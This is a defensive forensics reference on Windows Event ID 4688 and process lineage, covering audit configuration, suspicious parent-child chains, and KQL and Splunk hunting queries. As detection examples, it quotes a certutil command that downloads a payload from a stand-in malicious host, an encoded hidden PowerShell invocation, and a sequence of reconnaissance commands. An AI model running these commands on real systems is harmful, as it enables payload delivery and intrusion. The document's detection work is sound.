Artifact Analysis: Event ID 4688 & Process Lineage

Note

Executive Summary: Windows Security Event ID 4688 (“A new process has been created”) is the absolute bedrock of endpoint behavioral analysis. It records every execution on a Windows system, providing the identity of the user, the executable path, and the critical parent-child process relationship. When properly configured to log command-line arguments, Event 4688 transforms from a simple audit log into a definitive narrative of attacker intent, allowing analysts to hunt for Living off the Land (LOLBAS) techniques and reverse-shell executions.

1. The Visibility Prerequisite (GPO Configuration)

By default, modern Windows environments do not log process creation, nor do they capture command-line arguments, citing privacy and storage concerns. An Event 4688 without command-line data is severely degraded for DFIR purposes.

To unlock the full potential of this artifact, administrators must deploy a Group Policy Object (GPO) across the domain:

1. Enable Process Creation Auditing: Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Detailed Tracking. Set Audit Process Creation to Success.
2. Enable Command Line Auditing (CRITICAL): Navigate to Computer Configuration > Policies > Administrative Templates > System > Audit Process Creation. Set Include command line in process creation events to Enabled.

2. Anatomy of Event 4688

Once properly configured, parsing an Event 4688 record yields three highly structured categories of forensic data.

A. The Subject (Who)

• Security ID / Account Name: Identifies the user or service account that initiated the execution. If a standard user account spawns an administrative tool, it warrants immediate scrutiny.

B. New Process Information (What & How)

• New Process Name: The absolute path of the executed binary (e.g., C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe).
• New Process ID (PID): The hexadecimal identifier of the spawned process.
• Process Command Line: The most valuable field. It reveals exactly how the binary was executed, exposing arguments, flags, and embedded scripts (e.g., powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JAB...).

C. Creator Process Information (Where From)

• Creator Process Name: The path of the parent executable.
• Creator Process ID: The parent PID. This is the cryptographic link used to reconstruct the Process Lineage (the process tree).

3. DFIR Triage: Hunting by Process Lineage

Process Lineage analysis relies on understanding standard Windows behavior. Malicious activity often breaks these logical rules. Analysts stack Event 4688 logs to find anomalous Parent-Child relationships.

Phishing & Macro Abuse

Suspicious Lineage: outlook.exe or winword.exe → cmd.exe or powershell.exe. Word processors have no legitimate business spawning command interpreters. This is a classic signature of a malicious macro executing a dropper payload.

Web Shell Execution

Suspicious Lineage: w3wp.exe (IIS), httpd.exe, or tomcat.exe → cmd.exe or whoami.exe. If a web server daemon spawns an interactive shell or a reconnaissance binary, the server has been compromised via an RCE exploit or a Web Shell.

4. LOLBAS and Command Line Evasion

Threat actors heavily utilize Living Off The Land Binaries and Scripts (LOLBAS)—native Windows tools like certutil.exe, bitsadmin.exe, or rundll32.exe—to download payloads or execute code without dropping custom malware.

Event 4688 exposes these techniques via the Command Line field. Analysts must hunt for:

• Reconnaissance Cascades: Rapid sequential execution of whoami, net group "Domain Admins" /domain, systeminfo, and nltest.
• Base64 Obfuscation: Attackers encode PowerShell payloads to evade simple string-matching antiviruses. The presence of -enc, -EncodedCommand, or a massive block of alphanumeric characters in the command line is highly suspect.
• Remote Downloads: certutil.exe -urlcache -split -f http://malicious.com/payload.exe

5. Event 4688 vs. Sysmon Event ID 1

While native Event 4688 is excellent, Microsoft provides an advanced alternative: Sysmon Event ID 1 (Process Creation). If both are available, Sysmon is vastly superior.

Feature	Windows Event 4688	Sysmon Event ID 1
Command Line Logging	Requires separate GPO	Enabled by default
Binary Hash	Not available	MD5, SHA1, SHA256, IMPHASH
Original File Name	Not available	Yes (Defeats binary renaming)
Process GUID	Not available	Yes (Flawless cross-reboot correlation)

6. Threat Hunting Queries

Use these queries to proactively detect anomalous process lineage and obfuscation in your SIEM.

KQL (Defender XDR / Sentinel)

hunt_obfuscated_powershell.kql

// Detects PowerShell executions containing common Base64 encoded flags
SecurityEvent
| where EventID == 4688
| where ProcessName has "powershell.exe" or ProcessName has "pwsh.exe"
| where CommandLine contains "-e " or CommandLine contains "-enc" or CommandLine contains "-EncodedCommand"
| project TimeGenerated, Computer, Account, ParentProcessName, ProcessName, CommandLine
| sort by TimeGenerated desc

Splunk (Suspicious Parents)

hunt_suspicious_lineage.spl

# Detects Office applications or Web Servers spawning command shells
index=windows sourcetype="WinEventLog:Security" EventCode=4688
| eval ParentProcessName=lower(Creator_Process_Name)
| eval ProcessName=lower(New_Process_Name)
| search ParentProcessName IN ("*\\winword.exe", "*\\excel.exe", "*\\outlook.exe", "*\\w3wp.exe", "*\\httpd.exe")
  AND ProcessName IN ("*\\cmd.exe", "*\\powershell.exe", "*\\wscript.exe", "*\\cscript.exe")
| table _time, host, Account_Name, ParentProcessName, ProcessName, Process_Command_Line

---

References & Further Reading

• MITRE ATT&CK: Command and Scripting Interpreter (T1059)
• LOLBAS Project: Living Off The Land Binaries and Scripts
• Related Artifact: Sysmon (System Monitor) Telemetry
• Related Action: EDR Alert Triage & Lineage Analysis